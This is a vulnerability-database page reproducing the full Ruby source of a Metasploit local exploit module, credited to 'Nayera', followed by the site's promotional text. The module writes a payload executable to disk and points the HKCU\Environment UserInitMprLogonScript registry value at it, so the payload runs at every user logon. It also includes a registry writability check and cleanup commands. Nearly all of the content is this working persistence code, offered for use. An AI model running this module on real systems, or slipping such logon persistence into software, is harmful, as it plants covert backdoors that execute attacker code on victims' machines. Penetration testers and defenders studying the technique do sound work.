Lucene search
K

Windows Persistence via UserInitMprLogonScript

🗓️ 02 Apr 2026 19:02:02Reported by NayeraType 
metasploit
 metasploit
🔗 www.rapid7.com👁 151 Views

Creates persistence by setting UserInitMprLogonScript in HKCU Environment to run a payload on logon.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::Local::Persistence
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Persistence via UserInitMprLogonScript',
        'Description' => %q{
          This module establishes persistence by setting the UserInitMprLogonScript
          value in HKCU\Environment. During user logon, userinit.exe checks this value
          and executes the specified command or binary.

          The module writes a payload executable to disk and points
          UserInitMprLogonScript to that payload.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Nayera'],
        'Platform' => [ 'win' ],
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-07-01',
        'Notes' => {
          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.'])
    ])
  end

  def regkey
    'HKCU\\Environment'
  end

  def check
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%')

    return CheckCode::Safe("#{writable_dir} does not exist") unless exists?(writable_dir)

    test_name = Rex::Text.rand_text_alpha(8)
    test_value = Rex::Text.rand_text_alpha(8)
    return CheckCode::Safe("Unable to write to registry path #{regkey}") unless registry_setvaldata(regkey, test_name, test_value, 'REG_SZ')

    registry_deleteval(regkey, test_name)

    CheckCode::Vulnerable('Registry path is writable')
  end

  def install_persistence
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
    payload_exe = generate_payload_exe
    payload_pathname = "#{writable_dir}\\#{payload_name}.exe"

    vprint_good("Writing payload to #{payload_pathname}")
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)

    old_value = registry_getvaldata(regkey, 'UserInitMprLogonScript')
    registry_setvaldata(regkey, 'UserInitMprLogonScript', payload_pathname, 'REG_SZ')
    print_good("Configured #{regkey}\\UserInitMprLogonScript to execute #{payload_pathname}")

    if old_value.nil?
      @clean_up_rc = "reg deleteval -k '#{regkey}' -v 'UserInitMprLogonScript'\n"
    else
      escaped_old_value = old_value.gsub('\\', '\\\\')
      @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v UserInitMprLogonScript /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
    end
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation